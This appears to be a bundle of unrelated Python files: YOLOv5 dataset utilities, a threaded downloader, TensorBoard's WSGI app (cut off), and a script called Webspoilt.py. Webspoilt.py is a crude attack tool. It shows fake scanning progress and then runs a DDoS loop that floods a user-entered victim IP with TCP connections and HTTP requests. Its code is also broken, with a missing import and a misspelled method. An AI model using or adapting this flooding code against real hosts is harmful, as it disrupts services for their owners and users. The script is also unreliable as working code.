# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
random.shuffle(indices)
hp, wp = -1, -1 # height, width previous
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = (int(random.uniform(0, s)) for _ in self.mosaic_border) # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
@staticmethod
def collate_fn(batch):
im, label, path, shapes = zip(*batch) # transposed
for i, lb in enumerate(label):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
im4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0.0, 0, 0, 1, 0, 0]])
wo = torch.tensor([[0.0, 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, 0.5, 0.5, 0.5, 0.5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2.0, mode='bilinear', align_corners=False)[
0].type(img[i].type())
lb = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
lb = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
im4.append(im)
label4.append(lb)
for i, lb in enumerate(label4):
lb[:, 0] = i # add target image index for build_targets()
return torch.stack(im4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path=DATASETS_DIR / 'coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(str(path) + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path=DATASETS_DIR / 'coco128'): # from utils.datasets import *; extract_boxes()
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in IMG_FORMATS:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file) as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path=DATASETS_DIR / 'coco128/images', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit()
Arguments
path: Path to images directory
weights: Train, val, test weights (list, tuple)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sorted(x for x in path.rglob('*.*') if x.suffix[1:].lower() in IMG_FORMATS) # image files only
n = len(files) # number of files
random.seed(0) # for reproducibility
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path.parent / x).unlink(missing_ok=True) for x in txt] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
for i, img in tqdm(zip(indices, files), total=n):
if not annotated_only or Path(img2label_paths([str(img)])[0]).exists(): # check label
with open(path.parent / txt[i], 'a') as f:
f.write('./' + img.relative_to(path.parent).as_posix() + '\n') # add image to txt file
def verify_image_label(args):
# Verify one image-label pair
im_file, lb_file, prefix = args
nm, nf, ne, nc, msg, segments = 0, 0, 0, 0, '', [] # number (missing, found, empty, corrupt), message, segments
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in IMG_FORMATS, f'invalid image format {im.format}'
if im.format.lower() in ('jpg', 'jpeg'):
with open(im_file, 'rb') as f:
f.seek(-2, 2)
if f.read() != b'\xff\xd9': # corrupt JPEG
ImageOps.exif_transpose(Image.open(im_file)).save(im_file, 'JPEG', subsampling=0, quality=100)
msg = f'{prefix}WARNING: {im_file}: corrupt JPEG restored and saved'
# verify labels
if os.path.isfile(lb_file):
nf = 1 # label found
with open(lb_file) as f:
lb = [x.split() for x in f.read().strip().splitlines() if len(x)]
if any(len(x) > 6 for x in lb): # is segment
classes = np.array([x[0] for x in lb], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in lb] # (cls, xy1...)
lb = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
lb = np.array(lb, dtype=np.float32)
nl = len(lb)
if nl:
assert lb.shape[1] == 5, f'labels require 5 columns, {lb.shape[1]} columns detected'
assert (lb >= 0).all(), f'negative label values {lb[lb < 0]}'
assert (lb[:, 1:] <= 1).all(), f'non-normalized or out of bounds coordinates {lb[:, 1:][lb[:, 1:] > 1]}'
_, i = np.unique(lb, axis=0, return_index=True)
if len(i) < nl: # duplicate row check
lb = lb[i] # remove duplicates
if segments:
segments = segments[i]
msg = f'{prefix}WARNING: {im_file}: {nl - len(i)} duplicate labels removed'
else:
ne = 1 # label empty
lb = np.zeros((0, 5), dtype=np.float32)
else:
nm = 1 # label missing
lb = np.zeros((0, 5), dtype=np.float32)
return im_file, lb, shape, segments, nm, nf, ne, nc, msg
except Exception as e:
nc = 1
msg = f'{prefix}WARNING: {im_file}: ignoring corrupt image/label: {e}'
return [None, None, None, None, nm, nf, ne, nc, msg]
def dataset_stats(path='coco128.yaml', autodownload=False, verbose=False, profile=False, hub=False):
""" Return dataset statistics dictionary with images and instances counts per split per class
To run in parent directory: export PYTHONPATH="$PWD/yolov5"
Usage1: from utils.datasets import *; dataset_stats('coco128.yaml', autodownload=True)
Usage2: from utils.datasets import *; dataset_stats('path/to/coco128_with_yaml.zip')
Arguments
path: Path to data.yaml or data.zip (with data.yaml inside data.zip)
autodownload: Attempt to download dataset if not found locally
verbose: Print stats dictionary
"""
def round_labels(labels):
# Update labels to integer class and 6 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
def unzip(path):
# Unzip data.zip TODO: CONSTRAINT: path/to/abc.zip MUST unzip to 'path/to/abc/'
if str(path).endswith('.zip'): # path is data.zip
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
ZipFile(path).extractall(path=path.parent) # unzip
dir = path.with_suffix('') # dataset directory == zip name
return True, str(dir), next(dir.rglob('*.yaml')) # zipped, data_dir, yaml_path
else: # path is data.yaml
return False, None, path
def hub_ops(f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
f_new = im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, 'JPEG', quality=75, optimize=True) # save
except Exception as e: # use OpenCV
print(f'WARNING: HUB ops PIL failure {f}: {e}')
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(im, (int(im_width * r), int(im_height * r)), interpolation=cv2.INTER_AREA)
cv2.imwrite(str(f_new), im)
zipped, data_dir, yaml_path = unzip(Path(path))
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir # TODO: should this be dir.resolve()?
check_dataset(data, autodownload) # download dataset if missing
hub_dir = Path(data['path'] + ('-hub' if hub else ''))
stats = {'nc': data['nc'], 'names': data['names']} # statistics dictionary
for split in 'train', 'val', 'test':
if data.get(split) is None:
stats[split] = None # i.e. no test set
continue
x = []
dataset = LoadImagesAndLabels(data[split]) # load dataset
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics'):
x.append(np.bincount(label[:, 0].astype(int), minlength=data['nc']))
x = np.array(x) # shape(128x80)
stats[split] = {'instance_stats': {'total': int(x.sum()), 'per_class': x.sum(0).tolist()},
'image_stats': {'total': dataset.n, 'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{str(Path(k).name): round_labels(v.tolist())} for k, v in
zip(dataset.im_files, dataset.labels)]}
if hub:
im_dir = hub_dir / 'images'
im_dir.mkdir(parents=True, exist_ok=True)
for _ in tqdm(ThreadPool(NUM_THREADS).imap(hub_ops, dataset.im_files), total=dataset.n, desc='HUB Ops'):
pass
# Profile
stats_path = hub_dir / 'stats.json'
if profile:
for _ in range(1):
file = stats_path.with_suffix('.npy')
t1 = time.time()
np.save(file, stats)
t2 = time.time()
x = np.load(file, allow_pickle=True)
print(f'stats.npy times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
file = stats_path.with_suffix('.json')
t1 = time.time()
with open(file, 'w') as f:
json.dump(stats, f) # save stats *.json
t2 = time.time()
with open(file) as f:
x = json.load(f) # load hyps dict
print(f'stats.json times: {time.time() - t2:.3f}s read, {t2 - t1:.3f}s write')
# Save, print and return
if hub:
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(stats, f) # save stats.json
if verbose:
print(json.dumps(stats, indent=2, sort_keys=False))
return stats
|
ThreadFileDownloader.py
|
import io
import threading
import urllib.request
from pathlib import Path
from typing import Union
class ThreadFileDownloader:
"""
FileDownloader using sub thread
url str
savepath(None) str,Path
Use .get_error() to check the error
"""
def __init__(self, url, savepath : Union[str, Path] = None):
if savepath is not None:
savepath = Path(savepath)
self._partpath = savepath.parent / ( savepath.name + '.part' )
else:
self._partpath = None
self._savepath = savepath
self._url = url
self._error = None
self._file_size = None
self._file_size_dl = None
self._bytes = None
threading.Thread(target=self._thread, daemon=True).start()
def get_progress(self) -> float:
"""
return progress of downloading as [0.0...100.0] value
where 100.0 mean download is completed
"""
if self._file_size is None or self._file_size_dl is None:
return 0.0
return (self._file_size_dl / self._file_size) * 100.0
def get_bytes(self) -> bytes:
"""
return bytes of downloaded file if savepath is not defined
"""
return self._bytes
def get_error(self) -> Union[str, None]:
"""
returns error string or None if no error
"""
return self._error
def _thread(self):
try:
url_req = urllib.request.urlopen(self._url)
file_size = self._file_size = int( url_req.getheader('content-length') )
self._file_size_dl = 0
savepath = self._savepath
partpath = self._partpath
if partpath is not None:
if partpath.exists():
partpath.unlink()
f = open(partpath, 'wb')
else:
f = io.BytesIO()
while url_req is not None:
buffer = url_req.read(8192)
if not buffer:
break
f.write(buffer)
new_file_size_dl = self._file_size_dl + len(buffer)
if new_file_size_dl >= file_size:
if partpath is not None:
f.close()
if savepath.exists():
savepath.unlink()
partpath.rename(savepath)
else:
self._bytes = f.getvalue()
f.close()
url_req.close()
url_req = None
self._file_size_dl = new_file_size_dl
except Exception as e:
self._error = str(e)
|
Webspoilt.py
|
#author : Sayyed Viquar Ahmed (DeadSHot0x7)
from tqdm import tqdm
import time
import pyfiglet
import os
import socket
import urllib.request
import logging
for i in tqdm (range (101),
desc="Loading…",
ascii=False, ncols=75):
time.sleep(0.01)
print("Complete.")
os .system("cls")
def ipscanner(ip):
ip_add=socket.gethostbyname(ip)
for i in range (10,100,10):
time.sleep(2)
print("Loading",i,"%")
print(" \t [*] Sucessful Connected with the Server........!")
for j in range (0,5):
time.sleep(2)
print("[*] Now Scanning for the Ip address")
print ("[*] IP Address Found ........!")
time .sleep(5)
for k in range (0,4):
time .sleep(5)
print("[*]Decoding")
print("\t [*] IP ADDRES OF THE WEBSITE : \t ",ip_add)
def ddos_attack(a,j,s,i):
print("[*] Started Thread's")
time.sleep(5)
print("[*] Initalized Thread")
time .sleep(5)
target_ip=a
port=j
ip_address=s
k=i
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.connect((target_ip,port))
s.sendto(("GET /" + target_ip + "HTTP/1.1\r\n").encode(ascii), (target_ip,port))
s.sendyo(("Host : " + ip_address + "\r\n\r\n").encode(ascii), (target_ip , port))
for i in range (k):
thread=threading.Thread(target=ddos_attack)
thread.start();
time.sleep(5)
print(" DDOS ATTACK SUCEESFULL ON ",target_ip,"Address");
if __name__ == "__main__":
while(1):
try:
banner=pyfiglet.figlet_format("Webspoilt", font="slant")
print(banner)
print("\t Script by DeadShot0x7")
print("\n")
print("DeadShot0x7 will not responsible for the loss you have done or made ")
dec=str(input("y or n"))
if dec == "y" or dec == "Yes" or dec == "yes":
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.INFO)
print("Yes I'm Responsible for the loss I've made.")
else :
time.sleep(1)
break
print("\n")
print("1.Scann Ip Address 2.DDoS a Website")
print("3.Brtueforce 4.Port Scanner")
print("5.Update 6.Exit")
ans=int(input("Select your option\t"))
if ans == 1:
sitename=str(input("Enter The Website name \t"))
time.sleep(5)
ipscanner(sitename)
if ans == 2:
target_ip=str(input("Enter Victim's Ip address "));
port=int(input("Enter the Port number Defualt Port Number ( 3333) "));
ip_address=str(input("Enter your Ip address "));
bot=str(input("Enter Number Thread you want to send"));
ddos_attack(target_ip,port,ip_address,bot);
if ans == 3 :
print("\n \n ")
print("\t This Feature is comming Soons")
print("\n \n")
if ans == 4 :
print("CLosing the application ")
break
if ans ==5:
try:
os.system("git pull")
except Exception as e :
print("Can't update the script please check your internet Connection")
if ans == 6:
time.sleep("1")
break
except :
print("Cant Open th appliaction Due to some Error")
|
application.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
Provides TensorBoardWSGIApp for building a TensorBoard WSGI app.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import base64
import collections
import contextlib
import hashlib
import json
import os
import re
import shutil
import tempfile
import textwrap
import threading
import time
import six
from six.moves.urllib import (
parse as urlparse,
) # pylint: disable=wrong-import-order
from werkzeug import wrappers
from tensorboard import errors
from tensorboard import plugin_util
from tensorboard.backend import empty_path_redirect
from tensorboard.backend import experiment_id
from tensorboard.backend import experimental_plugin
from tensorboard.backend import http_util
from tensorboard.backend import path_prefix
from tensorboard.backend import security_validator
from tensorboard.backend.event_processing import (
data_provider as event_data_provider,
)
from tensorboard.backend.event_processing import (
plugin_event_accumulator as event_accumulator,
)
from tensorboard.backend.event_processing import (
plugin_event_multiplexer as event_multiplexer,
)
from tensorboard.plugins import base_plugin
from tensorboard.plugins.audio import metadata as audio_metadata
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.histogram import metadata as histogram_metadata
from tensorboard.plugins.image import metadata as image_metadata
from tensorboard.plugins.pr_curve import metadata as pr_curve_metadata
from tensorboard.plugins.scalar import metadata as scalar_metadata
from tensorboard.util import tb_logging
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.TENSORS: 10,
}
# TODO(@wchargin): Once SQL mode is in play, replace this with an
# alternative that does not privilege first-party plugins.
DEFAULT_TENSOR_SIZE_GUIDANCE = {
scalar_metadata.PLUGIN_NAME: 1000,
image_metadata.PLUGIN_NAME: 10,
audio_metadata.PLUGIN_NAME: 10,
histogram_metadata.PLUGIN_NAME: 500,
pr_curve_metadata.PLUGIN_NAME: 100,
}
DATA_PREFIX = "/data"
PLUGIN_PREFIX = "/plugin"
PLUGINS_LISTING_ROUTE = "/plugins_listing"
PLUGIN_ENTRY_ROUTE = "/plugin_entry.html"
EXPERIMENTAL_PLUGINS_QUERY_PARAM = "experimentalPlugin"
# Slashes in a plugin name could throw the router for a loop. An empty
# name would be confusing, too. To be safe, let's restrict the valid
# names as follows.
_VALID_PLUGIN_RE = re.compile(r"^[A-Za-z0-9_-]+$")
logger = tb_logging.get_logger()
def _parse_samples_per_plugin(flags):
result = {}
if not flags or not flags.samples_per_plugin:
return result
for token in flags.samples_per_plugin.split(","):
k, v = token.strip().split("=")
result[k] = int(v)
return result
def _apply_tensor_size_guidance(sampling_hints):
"""Apply user per-summary size guidance overrides."""
tensor_size_guidance = dict(DEFAULT_TENSOR_SIZE_GUIDANCE)
tensor_size_guidance.update(sampling_hints)
return tensor_size_guidance
def standard_tensorboard_wsgi(flags, plugin_loaders, assets_zip_provider):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugin_loaders: A list of TBLoader instances.
assets_zip_provider: See TBContext documentation for more information.
Returns:
The new TensorBoard WSGI application.
:type plugin_loaders: list[base_plugin.TBLoader]
:rtype: TensorBoardWSGI
"""
data_provider = None
multiplexer = None
reload_interval = flags.reload_interval
# Regular logdir loading mode.
sampling_hints = _parse_samples_per_plugin(flags)
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
tensor_size_guidance=_apply_tensor_size_guidance(sampling_hints),
purge_orphaned_data=flags.purge_orphaned_data,
max_reload_threads=flags.max_reload_threads,
event_file_active_filter=_get_event_file_active_filter(flags),
)
data_provider = event_data_provider.MultiplexerDataProvider(
multiplexer, flags.logdir or flags.logdir_spec
)
if reload_interval >= 0:
# We either reload the multiplexer once when TensorBoard starts up, or we
# continuously reload the multiplexer.
if flags.logdir:
path_to_run = {os.path.expanduser(flags.logdir): None}
else:
path_to_run = parse_event_files_spec(flags.logdir_spec)
start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval, flags.reload_task
)
return TensorBoardWSGIApp(
flags, plugin_loaders, data_provider, assets_zip_provider, multiplexer
)
def _handling_errors(wsgi_app):
def wrapper(*args):
(environ, start_response) = (args[-2], args[-1])
try:
return wsgi_app(*args)
except errors.PublicError as e:
request = wrappers.Request(environ)
error_app = http_util.Respond(
request, str(e), "text/plain", code=e.http_code
)
return error_app(environ, start_response)
# Let other exceptions be handled by the server, as an opaque
# internal server error.
return wrapper
def TensorBoardWSGIApp(
flags,
plugins,
data_provider=None,
assets_zip_provider=None,
deprecated_multiplexer=None,
):
"""Constructs a TensorBoard WSGI app from plugins and data providers.
Args:
flags: An argparse.Namespace containing TensorBoard CLI flags.
plugins: A list of plugin loader instances.
assets_zip_provider: See TBContext documentation for more information.
data_provider: Instance of `tensorboard.data.provider.DataProvider`. May
be `None` if `flags.generic_data` is set to `"false"` in which case
`deprecated_multiplexer` must be passed instead.
deprecated_multiplexer: Optional `plugin_event_multiplexer.EventMultiplexer`
to use for any plugins not yet enabled for the DataProvider API.
Required if the data_provider argument is not passed.
Returns:
A WSGI application that implements the TensorBoard backend.
:type plugins: list[base_plugin.TBLoader]
"""
plugin_name_to_instance = {}
context = base_plugin.TBContext(
data_provider=data_provider,
flags=flags,
logdir=flags.logdir,
multiplexer=deprecated_multiplexer,
assets_zip_provider=assets_zip_provider,
plugin_name_to_instance=plugin_name_to_instance,
sampling_hints=_parse_samples_per_plugin(flags),
window_title=flags.window_title,
)
tbplugins = []
experimental_plugins = []
for plugin_spec in plugins:
loader = make_plugin_loader(plugin_spec)
try:
plugin = loader.load(context)
except Exception:
logger.error(
"Failed to load plugin %s; ignoring it.",
getattr(loader.load, "__qualname__", loader.load),
exc_info=True,
)
plugin = None
if plugin is None:
continue
tbplugins.append(plugin)
if isinstance(
loader, experimental_plugin.ExperimentalPlugin
) or isinstance(plugin, experimental_plugin.ExperimentalPlugin):
experimental_plugins.append(plugin.plugin_name)
plugin_name_to_instance[plugin.plugin_name] = plugin
return TensorBoardWSGI(
tbplugins, flags.path_prefix, data_provider, experimental_plugins
)
class TensorBoardWSGI(object):
"""The TensorBoard WSGI app that delegates to a set of TBPlugin."""
def __init__(
self,
plugins,
path_prefix="",
data_provider=None,
experimental_plugins=None,
):
"""Constructs TensorBoardWSGI instance.
Args:
plugins: A list of base_plugin.TBPlugin subclass instances.
flags: An argparse.Namespace containing TensorBoard CLI flags.
data_provider: `tensorboard.data.provider.DataProvider` or
`None`; if present, will inform the "active" state of
`/plugins_listing`.
experimental_plugins: A list of plugin names that are only provided
experimentally. The corresponding plugins will only be activated for
a user if the user has specified the plugin with the experimentalPlugin
query parameter in the URL.
Returns:
A WSGI application for the set of all TBPlugin instances.
Raises:
ValueError: If some plugin has no plugin_name
ValueError: If some plugin has an invalid plugin_name (plugin
names must only contain [A-Za-z0-9_.-])
ValueError: If two plugins have the same plugin_name
ValueError: If some plugin handles a route that does not start
with a slash
:type plugins: list[base_plugin.TBPlugin]
"""
self._plugins = plugins
self._path_prefix = path_prefix
self._data_provider = data_provider
self._experimental_plugins = frozenset(experimental_plugins or ())
if self._path_prefix.endswith("/"):
# Should have been fixed by `fix_flags`.
raise ValueError(
"Trailing slash in path prefix: %r" % self._path_prefix
)
self.exact_routes = {
# TODO(@chihuahua): Delete this RPC once we have skylark rules that
# obviate the need for the frontend to determine which plugins are
# active.
DATA_PREFIX + PLUGINS_LISTING_ROUTE: self._serve_plugins_listing,
DATA_PREFIX + PLUGIN_ENTRY_ROUTE: self._serve_plugin_entry,
}
unordered_prefix_routes = {}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
plugin_names_encountered = set()
for plugin in self._plugins:
if plugin.plugin_name is None:
raise ValueError("Plugin %s has no plugin_name" % plugin)
if not _VALID_PLUGIN_RE.match(plugin.plugin_name):
raise ValueError(
"Plugin %s has invalid name %r"
% (plugin, plugin.plugin_name)
)
if plugin.plugin_name in plugin_names_encountered:
raise ValueError(
"Duplicate plugins for name %s" % plugin.plugin_name
)
plugin_names_encountered.add(plugin.plugin_name)
try:
plugin_apps = plugin.get_plugin_apps()
except Exception as e: # pylint: disable=broad-except
if (
type(plugin) is core_plugin.CorePlugin
): # pylint: disable=unidiomatic-typecheck
raise
logger.warn(
"Plugin %s failed. Exception: %s",
plugin.plugin_name,
str(e),
)
continue
for route, app in plugin_apps.items():
if not route.startswith("/"):
raise ValueError(
"Plugin named %r handles invalid route %r: "
"route does not start with a slash"
% (plugin.plugin_name, route)
)
if (
type(plugin) is core_plugin.CorePlugin
): # pylint: disable=unidiomatic-typecheck
path = route
else:
path = (
DATA_PREFIX
+ PLUGIN_PREFIX
+ "/"
+ plugin.plugin_name
+ route
)
if path.endswith("/*"):
# Note we remove the '*' but leave the slash in place.
path = path[:-1]
if "*" in path:
# note we re-add the removed * in the format string
raise ValueError(
"Plugin %r handles invalid route '%s*': Only "
"trailing wildcards are supported "
"(i.e., `/.../*`)" % (plugin.plugin_name, path)
)
unordered_prefix_routes[path] = app
else:
if "*" in path:
raise ValueError(
"Plugin %r handles invalid route %r: Only "
"trailing wildcards are supported "
"(i.e., `/.../*`)" % (plugin.plugin_name, path)
)
self.exact_routes[path] = app
# Wildcard routes will be checked in the given order, so we sort them
# longest to shortest so that a more specific route will take precedence
# over a more general one (e.g., a catchall route `/*` should come last).
self.prefix_routes = collections.OrderedDict(
sorted(
six.iteritems(unordered_prefix_routes),
key=lambda x: len(x[0]),
reverse=True,
)
)
self._app = self._create_wsgi_app()
def _create_wsgi_app(self):
"""Apply middleware to create the final WSGI app."""
app = self._route_request
app = empty_path_redirect.EmptyPathRedirectMiddleware(app)
app = experiment_id.ExperimentIdMiddleware(app)
app = path_prefix.PathPrefixMiddleware(app, self._path_prefix)
app = security_validator.SecurityValidatorMiddleware(app)
app = _handling_errors(app)
return app
@wrappers.Request.application
def _serve_plugin_entry(self, request):
"""Serves a HTML for iframed plugin entry point.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
name = request.args.get("name")
plugins = [
plugin for plugin in self._plugins if plugin.plugin_name == name
]
if not plugins:
raise errors.NotFoundError(name)
if len(plugins) > 1:
# Technically is not possible as plugin names are unique and is checked
# by the check on __init__.
reason = (
"Plugin invariant error: multiple plugins with name "
"{name} found: {list}"
).format(name=name, list=plugins)
raise AssertionError(reason)
plugin = plugins[0]
module_path = plugin.frontend_metadata().es_module_path
if not module_path:
return http_util.Respond(
request, "Plugin is not module loadable", "text/plain", code=400
)
# non-self origin is blocked by CSP but this is a good invariant checking.
if urlparse.urlparse(module_path).netloc:
raise ValueError("Expected es_module_path to be non-absolute path")
module_json = json.dumps("." + module_path)
script_content = "import({}).then((m) => void m.render());".format(
module_json
)
digest = hashlib.sha256(script_content.encode("utf-8")).digest()
script_sha = base64.b64encode(digest).decode("ascii")
html = textwrap.dedent(
"""
<!DOCTYPE html>
<head><base href="plugin/{name}/" /></head>
<body><script type="module">{script_content}</script></body>
"""
